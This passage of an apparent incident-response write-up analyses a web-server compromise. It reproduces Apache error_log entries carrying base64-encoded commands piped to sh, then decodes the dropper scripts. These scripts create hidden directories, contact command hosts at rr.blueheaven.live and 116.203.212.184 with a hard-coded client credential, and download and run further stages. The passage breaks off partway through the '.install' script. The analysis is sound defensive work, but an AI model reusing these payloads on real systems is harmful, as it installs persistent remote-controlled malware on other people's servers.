dGhlbiBpZmFjZXM9IiI7IGlmIFsgIiQoY29tbWFuZCAtdiBpcCAyPiAvZGV2L251bGwpIiBdOyB0aGVuIGlmYWNlcz0kKGlwIC00IC1vIGEgfCBjdXQgLWQgJyAnIC1mIDIsNyB8IGN1dCAtZCAnLycgLWYgMSB8IGF3ayAtRicgJyAne3ByaW50ICQxfScgfCB0ciAnXG4nICcgJyk7ICBlbHNlIGlmIFsgIiQoY29tbWFuZCAtdiBpZmNvbmZpZyAyPiAvZGV2L251bGwpIiBdOyB0aGVuIGlmYWNlcz0kKGlmY29uZmlnIC1hIHwgZ3JlcCBmbGFncyB8IGF3ayAne3NwbGl0KCQwLGEsIjoiKTsgcHJpbnQgYVsxXX0nIHwgdHIgJ1xuJyAnICcpOyBmaTsgZmk7IGZvciBldGggaW4gJGlmYWNlczsgZG8gb3V0PSQoY3VybCAt
[Sun Nov 14 01:25:50.735041 2021]  cyAtLWludGVyZmFjZSAkZXRoIC0tY29ubmVjdC10aW1lb3V0IDMgaHR0cDovLzExNi4yMDMuMjEyLjE4NC8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCk7IGVuYWJsZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsxXX0nKTsgb25saW5lPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzJdfScpOyBpZiBbICIkZW5hYmxlIiA9PSAiMSIgLWEgIiRvbmxpbmUiIC1lcSAiMSIgXTsgdGhlbiBlY2hvICIkZXRoIiA+IC5pbnRlcmZhY2U7IGJyZWFrOyBmaTsgZG9uZTsgZmk7IGlmIFsgLWYgIi5pbnRlcmZhY2UiIF07IHRoZW4gQ1VSTD0iY3VybCAtLWludGVyZmFjZSAiJChjYXQgLmludGVyZmFjZSAyPiAvZGV2L251bGwpOyBET009IjExNi4yMDMuMjEyLjE4NCI7IGZpOyAkQ1VSTCAtcyBodHRwOi8vJERPTS8xMDEwL2I2NC5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIC0tZGF0YS11cmxlbmNvZGUgJ3M9VUVGVVNEMHZjMkpwYmpvdlltbHVPaTkxYzNJdmMySnBiam92ZFhOeUwySnBiam92ZFhOeUwyeHZZMkZzTDJKcGJncERWVkpNUFNKamRYSnNJZ3BFVDAwOUluSnlMbUpzZFdWb1pXRjJaVzR1YkdsMlpTSUtDbkJyYVd4c0lDMDVJQzFtSUNJdWMzSmpMbk5vSWdwd2EybHNiQ0F0T1NBdFppQWljSEJ5YjNoNUlncHZkWFE5SkNoamRYSnNJQzF6SUMwdFkyOXVibVZqZEMxMGFXMWxiM1YwSURVZ2FIUjBjRG92TDNKeUxtSnNkV1ZvWldGMlpXNHViR2wyWlM4eE1ERXdMMjl1YkdsdVpTNXdhSEFnTFhVZ1kyeHBaVzUwT2lWQU1USXpMVFExTmtBbElESStJQzlrWlhZdmJuVnNiQ2tLWlc1aFlteGxQU1FvWldOb2J5QWtiM1YwSUh3Z1lYZHJJQ2Q3YzNCc2FYUW9KREFzWVN3aUxDSXBPeUJ3Y21sdWRDQmhXekZkZlNjcENtOXViR2x1WlQwa0tHVmphRzhnSkc5MWRDQjhJR0YzYXlBbmUzTndiR2wwS0NRd0xHRXNJaXdpS1RzZ2NISnBiblFnWVZzeVhYMG5LUXBwWmlCYklDRWdJaVJsYm1GaWJHVWlJQzFsY1NBaU1TSWdMV0VnSVNBaUpHOXViR2x1WlNJZ0xXVnhJQ0l4SWlCZE95QjBhR1Z1Q2dscFptRmpaWE05SWlJS0NXbG1JRnNnSWlRb1kyOXRiV0Z1WkNBdGRpQnBjQ0F5UGlBdlpHVjJMMjUxYkd3cElpQmRPeUIwYUdWdUNna0phV1poWTJWelBTUW9hWEFnTFRRZ0xXOGdZU0I4SUdOMWRDQXRaQ0FuSUNjZ0xXWWdNaXczSUh3Z1kzVjBJQzFrSUNjdkp5QXRaaUF4SUh3Z1lYZHJJQzFHSnlBbklDZDdjSEpwYm5RZ0pERjlKeUI4SUhSeUlDZGNiaWNnSnlBbktRb0paV3h6WlFvSkNXbG1JRnNnSWlRb1kyOXRiV0Z1WkNBdGRpQnBabU52Ym1acFp5QXlQaUF2WkdWMkwyNTFiR3dwSWlCZE95QjBhR1Z1Q2drSkNXbG1ZV05sY3owa0tHbG1ZMjl1Wm1sbklDMWhJSHdnWjNKbGNDQm1iR0ZuY3lCOElHRjNheUFuZTNOd2JHbDBLQ1F3TEdFc0lqb2lLVHNnY0hKcGJuUWdZVnN4WFgwbklId2dkSElnSjF4dUp5QW5J
[Sun Nov 14 01:25:50.735078 2021]  Q2NwQ2drSlpta0tDV1pwQ2dsbWIzSWdaWFJvSUdsdUlDUnBabUZqWlhNN0lHUnZDZ2tKYjNWMFBTUW9ZM1Z5YkNBdGN5QXRMV2x1ZEdWeVptRmpaU0FrWlhSb0lDMHRZMjl1Ym1WamRDMTBhVzFsYjNWMElEVWdhSFIwY0Rvdkx6RXhOaTR5TURNdU1qRXlMakU0TkM4eE1ERXdMMjl1YkdsdVpTNXdhSEFnTFhVZ1kyeHBaVzUwT2lWQU1USXpMVFExTmtBbElESStJQzlrWlhZdmJuVnNiQ2tLQ1FsbGJtRmliR1U5SkNobFkyaHZJQ1J2ZFhRZ2ZDQmhkMnNnSjN0emNHeHBkQ2drTUN4aExDSXNJaWs3SUhCeWFXNTBJR0ZiTVYxOUp5a0tDUWx2Ym14cGJtVTlKQ2hsWTJodklDUnZkWFFnZkNCaGQyc2dKM3R6Y0d4cGRDZ2tNQ3hoTENJc0lpazdJSEJ5YVc1MElHRmJNbDE5SnlrS0NRbHBaaUJiSUNJa1pXNWhZbXhsSWlBOVBTQWlNU0lnTFdFZ0lpUnZibXhwYm1VaUlEMDlJQ0l4SWlCZE95QjBhR1Z1Q2drSkNXVmphRzhnSWlSbGRHZ2lJRDRnTG1sdWRHVnlabUZqWlFvSkNRbGljbVZoYXdvSkNXWnBDZ2xrYjI1bENtWnBDZ3BwWmlCYklDMW1JQ0l1YVc1MFpYSm1ZV05sSWlCZE95QjBhR1Z1Q2dsRFZWSk1QU0pqZFhKc0lDMHRhVzUwWlhKbVlXTmxJQ0lrS0dOaGRDQXVhVzUwWlhKbVlXTmxJREkrSUM5a1pYWXZiblZzYkNrS0NVUlBUVDBpTVRFMkxqSXdNeTR5TVRJdU1UZzBJZ3BtYVFvS2IzVjBQU1FvSkVOVlVrd2dMWE1nYUhSMGNEb3ZMeVJFVDAwdk1UQXhNQzl6Y21NdWNHaHdJQzExSUdOc2FXVnVkRG9sUURFeU15MDBOVFpBSlNBeVBpQXZaR1YyTDI1MWJHd3BDbVZ1WVdKc1pUMGtLR1ZqYUc4Z0pHOTFkQ0I4SUdGM2F5QW5lM053YkdsMEtDUXdMR0VzSWl3aUtUc2djSEpwYm5RZ1lWc3hYWDBuS1FwaVlYTmxQU1FvWldOb2J5QWtiM1YwSUh3Z1lYZHJJQ2Q3YzNCc2FYUW9KREFzWVN3aUxDSXBPeUJ3Y21sdWRDQmhXekpkZlNjcENtbG1JRnNnSWlSbGJtRmliR1VpSUMxbGNTQWlNU0lnWFRzZ2RHaGxiZ29KY20wZ0xYSm1JQzV0YVc1cFkyOXVaR0V1YzJnZ0xtRndhU0F1YVhCcFpDQXVjM0JwWkNBdVkzSnZiaTV6YUNBdWMzSmpMbk5vT3lBa1ExVlNUQ0F0Y3lCb2RIUndPaTh2SkVSUFRTOHhNREV3TDJJMk5DNXdhSEFnTFhVZ1kyeHBaVzUwT2lWQU1USXpMVFExTmtBbElDMHRaR0YwWVMxMWNteGxibU52WkdVZ0luTTlKR0poYzJVaUlDMXZJQzV6Y21NdWMyZ2dNajRnTDJSbGRpOXVkV3hzSUNZbUlHTm9iVzlrSUN0NElDNXpjbU11YzJnZ1BpQXZaR1YyTDI1MWJHd2dNajRtTVFvSmMyZ2dMbk55WXk1emFDQStJQzlrWlhZdmJuVnNiQ0F5UGlZeElDWUtabWtLY20wZ0xYSm1JQzVwYm5OMFlXeHNDZz09JyAtbyAuaW5zdGFsbDsgY2htb2QgK3ggLmluc3RhbGw7IHNoIC5pbnN0YWxsID4gL2Rldi9udWxsIDI+JjEgJiBlY2hvICdEb25lJzsgZWxzZSBlY2hvICdBbHJlYWR5IGluc3RhbGwuIFN0YXJ0ZWQnOyBjZCAubG9nLzEwMTA2OC8uc3Bvb2xsb2cgJiYgc2ggLmNyb24uc2ggPiAvZGV2L251bGwgMj4mMSAmIGZp
[Sun Nov 14 01:25:50.735111 2021]  OyBlbHNlIGVjaG8gJ0FscmVhZHkgaW5zdGFsbCBSdW5uaW5nJztmaQ==' | sh 2>&1
[Sun Nov 14 03:12:39.237848 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;curl -s http://116.203.212.184/1010/b64.php -u client:%@123-456@% --data-urlencode 's=UEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbjovdXNyL2xvY2FsL2JpbjtpcGF0aD0nbnVsbCc7IGZvciBsaW5lIGluICQoZmluZCAvdmFyL2xvZyAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICIkaXBhdGgiID0gIm51bGwiIF07IHRoZW4gaXBhdGg9JChjYXQgL2V0Yy9wYXNzd2QgfCBncmVwICJeJCh3aG9hbWkpIiB8IGN1dCAtZDogLWY2KTsgZm9yIGxpbmUgaW4gJChmaW5kICRpcGF0aCAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICEgLXcgJGlwYXRoIF07IHRoZW4gaXBhdGg9Jy92YXIvdG1wJzsgaWYgWyAhIC13ICRpcGF0aCBdOyB0aGVuIGlwYXRoPScvdG1wJzsgZmk7IGZpOyBmaQppZiBbICEgIiQocHMgYXV4IHwgZ3JlcCAtdiBncmVwIHwgZ3JlcCAnLnNyYy5zaCcpIiBdOyB0aGVuIAoJY2QgJGlwYXRoCglpZiBbICEgLWYgIi5sb2cvMTAxMDY4Ly5zcG9vbGxvZy8uc3JjLnNoIiAtbyAhIC1mICIubG9nLzEwMTA2OC8uc3Bvb2xsb2cvLmNyb24uc2giIF07IHRoZW4KCQlpZiBbICEgLWQgIi5sb2cvMTAxMDY4Ly5zcG9vbGxvZyIgXTsgdGhlbiAKCQkJaT0xMDEwMDA7d2hpbGUgWyAkaSAtbmUgMTAxMTAwIF07IGRvIGk9JCgoJGkrMSkpOyBta2RpciAtcCAubG9nLyRpLy5zcG9vbGxvZzsgZG9uZQoJCWZpCgkJY2QgLmxvZy8xMDEwNjgvLnNwb29sbG9nICYmIGVjaG8gJ2FwYWNoZScgPiAucGluZm8gJiYgQ1VSTD0iY3VybCI7RE9NPSJyci5ibHVlaGVhdmVuLmxpdmUiO291dD0kKGN1cmwgLXMgLS1jb25uZWN0LXRpbWVvdXQgMyBodHRwOi8vcnIuYmx1ZWhlYXZlbi5saXZlLzEwMTAvb25saW5lLnBocCAtdSBjbGllbnQ6JUAxMjMtNDU2QCUgMj4gL2Rldi9udWxsKTtlbmFibGU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMV19Jyk7b25saW5lPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzJdfScpOyBpZiBbICEgIiRlbmFibGUiIC1lcSAiMSIgLWEgISAiJG9ubGluZSIgLWVxICIxIiBdOyB0aGVuIGlmYWNlcz0iIjsgaWYgWyAiJChjb21tYW5kIC12IGlwIDI+IC9kZXYvbnVsbCkiIF07IHRoZW4gaWZhY2VzPSQoaXAgLTQgLW8gYSB8IGN1dCAtZCAnICcgLWYgMiw3IHwgY3V0IC1kICcvJyAtZiAxIHwgYXdrIC1GJyAnICd7cHJpbnQgJDF9JyB8IHRyICdcbicgJyAnKTsgIGVsc2UgaWYgWyAiJChjb21tYW5kIC12IGlmY29uZmlnIDI+IC9kZXYvbnVsbCkiIF07IHRoZW4gaWZhY2VzPSQoaWZjb25maWcgLWEg
[Sun Nov 14 03:12:39.237940 2021]  fCBncmVwIGZsYWdzIHwgYXdrICd7c3BsaXQoJDAsYSwiOiIpOyBwcmludCBhWzFdfScgfCB0ciAnXG4nICcgJyk7IGZpOyBmaTsgZm9yIGV0aCBpbiAkaWZhY2VzOyBkbyBvdXQ9JChjdXJsIC1zIC0taW50ZXJmYWNlICRldGggLS1jb25uZWN0LXRpbWVvdXQgMyBodHRwOi8vMTE2LjIwMy4yMTIuMTg0LzEwMTAvb25saW5lLnBocCAtdSBjbGllbnQ6JUAxMjMtNDU2QCUgMj4gL2Rldi9udWxsKTsgZW5hYmxlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzFdfScpOyBvbmxpbmU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMl19Jyk7IGlmIFsgIiRlbmFibGUiID09ICIxIiAtYSAiJG9ubGluZSIgLWVxICIxIiBdOyB0aGVuIGVjaG8gIiRldGgiID4gLmludGVyZmFjZTsgYnJlYWs7IGZpOyBkb25lOyBmaTsgaWYgWyAtZiAiLmludGVyZmFjZSIgXTsgdGhlbiBDVVJMPSJjdXJsIC0taW50ZXJmYWNlICIkKGNhdCAuaW50ZXJmYWNlIDI+IC9kZXYvbnVsbCk7IERPTT0iMTE2LjIwMy4yMTIuMTg0IjsgZmk7ICRDVVJMIC1zIGh0dHA6Ly8kRE9NLzEwMTAvYjY0LnBocCAtdSBjbGllbnQ6JUAxMjMtNDU2QCUgLS1kYXRhLXVybGVuY29kZSAncz1VRUZVU0QwdmMySnBiam92WW1sdU9pOTFjM0l2YzJKcGJqb3ZkWE55TDJKcGJqb3ZkWE55TDJ4dlkyRnNMMkpwYmdwRFZWSk1QU0pqZFhKc0lncEVUMDA5SW5KeUxtSnNkV1ZvWldGMlpXNHViR2wyWlNJS0NuQnJhV3hzSUMwNUlDMW1JQ0l1YzNKakxuTm9JZ3B3YTJsc2JDQXRPU0F0WmlBaWNIQnliM2g1SWdwdmRYUTlKQ2hqZFhKc0lDMXpJQzB0WTI5dWJtVmpkQzEwYVcxbGIzVjBJRFVnYUhSMGNEb3ZMM0p5TG1Kc2RXVm9aV0YyWlc0dWJHbDJaUzh4TURFd0wyOXViR2x1WlM1d2FIQWdMWFVnWTJ4cFpXNTBPaVZBTVRJekxUUTFOa0FsSURJK0lDOWtaWFl2Ym5Wc2JDa0taVzVoWW14bFBTUW9aV05vYnlBa2IzVjBJSHdnWVhkcklDZDdjM0JzYVhRb0pEQXNZU3dpTENJcE95QndjbWx1ZENCaFd6RmRmU2NwQ205dWJHbHVaVDBrS0dWamFHOGdKRzkxZENCOElHRjNheUFuZTNOd2JHbDBLQ1F3TEdFc0lpd2lLVHNnY0hKcGJuUWdZVnN5WFgwbktRcHBaaUJiSUNFZ0lpUmxibUZpYkdVaUlDMWxjU0FpTVNJZ0xXRWdJU0FpSkc5dWJHbHVaU0lnTFdWeElDSXhJaUJkT3lCMGFHVnVDZ2xwWm1GalpYTTlJaUlLQ1dsbUlGc2dJaVFvWTI5dGJXRnVaQ0F0ZGlCcGNDQXlQaUF2WkdWMkwyNTFiR3dwSWlCZE95QjBhR1Z1Q2drSmFXWmhZMlZ6UFNRb2FYQWdMVFFnTFc4Z1lTQjhJR04xZENBdFpDQW5JQ2NnTFdZZ01pdzNJSHdnWTNWMElDMWtJQ2N2SnlBdFppQXhJSHdnWVhkcklDMUdKeUFuSUNkN2NISnBiblFnSkRGOUp5QjhJSFJ5SUNkY2JpY2dKeUFuS1FvSlpXeHpaUW9KQ1dsbUlGc2dJaVFvWTI5dGJXRnVaQ0F0ZGlCcFptTnZibVpwWnlBeVBpQXZaR1YyTDI1MWJHd3BJaUJkT3lCMGFHVnVDZ2tKQ1ds
[Sun Nov 14 03:12:39.237980 2021]  bVlXTmxjejBrS0dsbVkyOXVabWxuSUMxaElId2daM0psY0NCbWJHRm5jeUI4SUdGM2F5QW5lM053YkdsMEtDUXdMR0VzSWpvaUtUc2djSEpwYm5RZ1lWc3hYWDBuSUh3Z2RISWdKMXh1SnlBbklDY3BDZ2tKWm1rS0NXWnBDZ2xtYjNJZ1pYUm9JR2x1SUNScFptRmpaWE03SUdSdkNna0piM1YwUFNRb1kzVnliQ0F0Y3lBdExXbHVkR1Z5Wm1GalpTQWtaWFJvSUMwdFkyOXVibVZqZEMxMGFXMWxiM1YwSURVZ2FIUjBjRG92THpFeE5pNHlNRE11TWpFeUxqRTROQzh4TURFd0wyOXViR2x1WlM1d2FIQWdMWFVnWTJ4cFpXNTBPaVZBTVRJekxUUTFOa0FsSURJK0lDOWtaWFl2Ym5Wc2JDa0tDUWxsYm1GaWJHVTlKQ2hsWTJodklDUnZkWFFnZkNCaGQyc2dKM3R6Y0d4cGRDZ2tNQ3hoTENJc0lpazdJSEJ5YVc1MElHRmJNVjE5SnlrS0NRbHZibXhwYm1VOUpDaGxZMmh2SUNSdmRYUWdmQ0JoZDJzZ0ozdHpjR3hwZENna01DeGhMQ0lzSWlrN0lIQnlhVzUwSUdGYk1sMTlKeWtLQ1FscFppQmJJQ0lrWlc1aFlteGxJaUE5UFNBaU1TSWdMV0VnSWlSdmJteHBibVVpSUQwOUlDSXhJaUJkT3lCMGFHVnVDZ2tKQ1dWamFHOGdJaVJsZEdnaUlENGdMbWx1ZEdWeVptRmpaUW9KQ1FsaWNtVmhhd29KQ1dacENnbGtiMjVsQ21acENncHBaaUJiSUMxbUlDSXVhVzUwWlhKbVlXTmxJaUJkT3lCMGFHVnVDZ2xEVlZKTVBTSmpkWEpzSUMwdGFXNTBaWEptWVdObElDSWtLR05oZENBdWFXNTBaWEptWVdObElESStJQzlrWlhZdmJuVnNiQ2tLQ1VSUFRUMGlNVEUyTGpJd015NHlNVEl1TVRnMElncG1hUW9LYjNWMFBTUW9KRU5WVWt3Z0xYTWdhSFIwY0Rvdkx5UkVUMDB2TVRBeE1DOXpjbU11Y0dod0lDMTFJR05zYVdWdWREb2xRREV5TXkwME5UWkFKU0F5UGlBdlpHVjJMMjUxYkd3cENtVnVZV0pzWlQwa0tHVmphRzhnSkc5MWRDQjhJR0YzYXlBbmUzTndiR2wwS0NRd0xHRXNJaXdpS1RzZ2NISnBiblFnWVZzeFhYMG5LUXBpWVhObFBTUW9aV05vYnlBa2IzVjBJSHdnWVhkcklDZDdjM0JzYVhRb0pEQXNZU3dpTENJcE95QndjbWx1ZENCaFd6SmRmU2NwQ21sbUlGc2dJaVJsYm1GaWJHVWlJQzFsY1NBaU1TSWdYVHNnZEdobGJnb0pjbTBnTFhKbUlDNXRhVzVwWTI5dVpHRXVjMmdnTG1Gd2FTQXVhWEJwWkNBdWMzQnBaQ0F1WTNKdmJpNXphQ0F1YzNKakxuTm9PeUFrUTFWU1RDQXRjeUJvZEhSd09pOHZKRVJQVFM4eE1ERXdMMkkyTkM1d2FIQWdMW
[Sun Nov 14 03:12:39.238012 2021]  FVnWTJ4cFpXNTBPaVZBTVRJekxUUTFOa0FsSUMwdFpHRjBZUzExY214bGJtTnZaR1VnSW5NOUpHSmhjMlVpSUMxdklDNXpjbU11YzJnZ01qNGdMMlJsZGk5dWRXeHNJQ1ltSUdOb2JXOWtJQ3Q0SUM1emNtTXVjMmdnUGlBdlpHVjJMMjUxYkd3Z01qNG1NUW9KYzJnZ0xuTnlZeTV6YUNBK0lDOWtaWFl2Ym5Wc2JDQXlQaVl4SUNZS1pta0tjbTBnTFhKbUlDNXBibk4wWVd4c0NnPT0nIC1vIC5pbnN0YWxsOyBjaG1vZCAreCAuaW5zdGFsbDsgc2ggLmluc3RhbGwgPiAvZGV2L251bGwgMj4mMSAmIAoJCWVjaG8gJ0RvbmUnCgllbHNlCgkJZWNobyAnQWxyZWFkeSBpbnN0YWxsLiBTdGFydGVkJzsgY2QgLmxvZy8xMDEwNjgvLnNwb29sbG9nICYmIHNoIC5jcm9uLnNoID4gL2Rldi9udWxsIDI+JjEgJiAKCWZpCmVsc2UgCgllY2hvICdBbHJlYWR5IGluc3RhbGwgUnVubmluZycKZmkK' | sh 2>&1

After an initial check to see if the web server is vulnerable, the next three requests attempt to launch encoded scripts by bouncing the decoding off the URL hxxp://116.203.212.184/1010/b64.php. The hard-coded IP in the URL is owned by the same hosting provider as the IP of the original request. Also note the possibly unique client ID “client:%@123-456@%” in the requests.

Decoding the first request, we get back a simple script that checks to see if a process named “.src.sh” is already running:

if [ ! "$(ps aux | grep -v grep | grep '.src.sh')" ]; then
        printf %b "no process\n"
else
        printf %b "running\n"
fi
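
Note that you don’t need the attacker’s b64.php endpoint to do this decoding; the blobs recovered from the error_log decode locally with base64. For example, using the blob from the 01:14 request:

# echo 'aWYgWyAhICIkKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgJy5zcmMuc2gnKSIgXTsgdGhlbgoJcHJpbnRmICViICJubyBwcm9jZXNzXG4iCmVsc2UKCXByaW50ZiAlYiAicnVubmluZ1xuIgpmaQo=' | base64 -d
if [ ! "$(ps aux | grep -v grep | grep '.src.sh')" ]; then
        printf %b "no process\n"
else
        printf %b "running\n"
fi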

Then there are web requests at 01:25 and 03:12 with much larger encoded blobs. Decoding both blobs, we find essentially the same script with minor modifications. Here’s the script from the 01:25 web request, which I’ve decoded and reformatted for easier reading:

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;

ipath='null';
for line in $(find /var/log -type d 2> /dev/null); do
    if [ -w $line ]; then
        ipath=$line;
        break;
    fi;
done;

if [ "$ipath" = "null" ]; then
    ipath=$(cat /etc/passwd | grep "^$(whoami)" | cut -d: -f6);
    for line in $(find $ipath -type d 2> /dev/null); do
        if [ -w $line ]; then
            ipath=$line;
            break;
        fi;
    done;

    if [ ! -w $ipath ]; then
        ipath='/var/tmp';
        if [ ! -w $ipath ]; then
            ipath='/tmp';
        fi;
    fi;
fi;

if [ ! "$(ps aux | grep -v grep | grep '.src.sh')" ]; then
    cd $ipath &&
    if [ ! -d ".log/101068" ]; then
        i=101000;
        while [ $i -ne 101100 ]; do
            i=$(($i+1));
            mkdir -p .log/$i/.spoollog;
        done &&
        cd .log/101068/.spoollog &&
        echo 'apache' > .pinfo &&
        CURL="curl";
        DOM="rr.blueheaven.live";
        out=$(curl -s --connect-timeout 3 http://rr.blueheaven.live/1010/online.php -u client:%@123-456@% 2> /dev/null);
        enable=$(echo $out | awk '{split($0,a,","); print a[1]}');
        online=$(echo $out | awk '{split($0,a,","); print a[2]}');
        if [ ! "$enable" -eq "1" -a ! "$online" -eq "1" ]; then
            ifaces="";
            if [ "$(command -v ip 2> /dev/null)" ]; then
                ifaces=$(ip -4 -o a | cut -d ' ' -f 2,7 | cut -d '/' -f 1 | awk -F' ' '{print $1}' | tr '\n' ' ');
            else if [ "$(command -v ifconfig 2> /dev/null)" ]; then
                ifaces=$(ifconfig -a | grep flags | awk '{split($0,a,":"); print a[1]}' | tr '\n' ' ');
            fi;
        fi;

        for eth in $ifaces; do
            out=$(curl -s --interface $eth --connect-timeout 3 http://116.203.212.184/1010/online.php -u client:%@123-456@% 2> /dev/null);
            enable=$(echo $out | awk '{split($0,a,","); print a[1]}');
            online=$(echo $out | awk '{split($0,a,","); print a[2]}');
            if [ "$enable" == "1" -a "$online" -eq "1" ]; then
                echo "$eth" > .interface;
                break;
            fi;
        done;
    fi;

    if [ -f ".interface" ]; then
        CURL="curl --interface "$(cat .interface 2> /dev/null);
        DOM="116.203.212.184";
    fi;
    $CURL -s http://$DOM/1010/b64.php -u client:%@123-456@% --data-urlencode 's=UEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbjovdXNyL2xvY2FsL2JpbgpDVVJMPSJjdXJsIgpET009InJyLmJsdWVoZWF2ZW4ubGl2ZSIKCnBraWxsIC05IC1mICIuc3JjLnNoIgpwa2lsbCAtOSAtZiAicHByb3h5IgpvdXQ9JChjdXJsIC1zIC0tY29ubmVjdC10aW1lb3V0IDUgaHR0cDovL3JyLmJsdWVoZWF2ZW4ubGl2ZS8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCkKZW5hYmxlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzFdfScpCm9ubGluZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsyXX0nKQppZiBbICEgIiRlbmFibGUiIC1lcSAiMSIgLWEgISAiJG9ubGluZSIgLWVxICIxIiBdOyB0aGVuCglpZmFjZXM9IiIKCWlmIFsgIiQoY29tbWFuZCAtdiBpcCAyPiAvZGV2L251bGwpIiBdOyB0aGVuCgkJaWZhY2VzPSQoaXAgLTQgLW8gYSB8IGN1dCAtZCAnICcgLWYgMiw3IHwgY3V0IC1kICcvJyAtZiAxIHwgYXdrIC1GJyAnICd7cHJpbnQgJDF9JyB8IHRyICdcbicgJyAnKQoJZWxzZQoJCWlmIFsgIiQoY29tbWFuZCAtdiBpZmNvbmZpZyAyPiAvZGV2L251bGwpIiBdOyB0aGVuCgkJCWlmYWNlcz0kKGlmY29uZmlnIC1hIHwgZ3JlcCBmbGFncyB8IGF3ayAne3NwbGl0KCQwLGEsIjoiKTsgcHJpbnQgYVsxXX0nIHwgdHIgJ1xuJyAnICcpCgkJZmkKCWZpCglmb3IgZXRoIGluICRpZmFjZXM7IGRvCgkJb3V0PSQoY3VybCAtcyAtLWludGVyZmFjZSAkZXRoIC0tY29ubmVjdC10aW1lb3V0IDUgaHR0cDovLzExNi4yMDMuMjEyLjE4NC8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCkKCQllbmFibGU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMV19JykKCQlvbmxpbmU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMl19JykKCQlpZiBbICIkZW5hYmxlIiA9PSAiMSIgLWEgIiRvbmxpbmUiID09ICIxIiBdOyB0aGVuCgkJCWVjaG8gIiRldGgiID4gLmludGVyZmFjZQoJCQlicmVhawoJCWZpCglkb25lCmZpCgppZiBbIC1mICIuaW50ZXJmYWNlIiBdOyB0aGVuCglDVVJMPSJjdXJsIC0taW50ZXJmYWNlICIkKGNhdCAuaW50ZXJmYWNlIDI+IC9kZXYvbnVsbCkKCURPTT0iMTE2LjIwMy4yMTIuMTg0IgpmaQoKb3V0PSQoJENVUkwgLXMgaHR0cDovLyRET00vMTAxMC9zcmMucGhwIC11IGNsaWVudDolQDEyMy00NTZAJSAyPiAvZGV2L251bGwpCmVuYWJsZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsxXX0nKQpiYXNlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzJdfScpCmlmIFsgIiRlbmFibGUiIC1lcSAiMSIgXTsgdGhlbgoJcm0gLXJmIC5taW5pY29uZGEuc2ggLmFwaSAuaXBpZCAuc3BpZCAuY3Jvbi5zaCAuc3JjLnNoOyAkQ1VSTCAtcyBodHRwOi8vJERPTS8xMDEwL2I2NC5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIC0tZGF0YS11cmxlbmNvZGUgInM9JGJhc2UiIC1vIC5zcmMuc2ggMj4gL2Rldi9udWxsICYmIGNobW9kICt4IC5zcmMuc2ggPiAvZGV2L251bGwgMj4mMQoJc2ggLnNyYy5zaCA+IC9kZXYvbnVsbCAyPiYxICYKZmkKcm0gLXJmIC5pbnN0YWxsCg==' -o .install;
    chmod +x .install;
    sh .install > /dev/null 2>&1 & echo 'Done';
else
    echo 'Already install. Started';
    cd .log/101068/.spoollog && sh .cron.sh > /dev/null 2>&1 &
fi;
else
    echo 'Already install Running';
fi

I’m not going to go through this script in detail, nor critique the shell programming. The first part of the script goes about setting up an installation directory for the exploit, and you can see references to the “.log/101068/.spoollog” directory we found the exploit running from. The script attempts to check internet access via the URLs hxxp://rr.blueheaven.live/1010/online.php and hxxp://116.203.212.184/1010/online.php. At the time of this writing rr.blueheaven.live resolves to the hard-coded IP 116.203.212.184 in the second URL. The script then uses hxxp://116.203.212.184/1010/b64.php to decode another script, writes it to disk in the exploit installation directory as “.install”, and then runs it.

Here is the decoded, reformatted script that gets written to “.install”:

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
CURL="curl"
DOM="rr.blueheaven.live"

pkill -9 -f ".src.sh"
pkill -9 -f "pproxy"
out=$(curl -s --connect-timeout 5 http://rr.blueheaven.live/1010/online.php -u client:%@123-456@% 2> /dev/null)
enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
online=$(echo $out | awk '{split($0,a,","); print a[2]}')
if [ ! "$enable" -eq "1" -a ! "$online" -eq "1" ]; then
        ifaces=""
        if [ "$(command -v ip 2> /dev/null)" ]; then
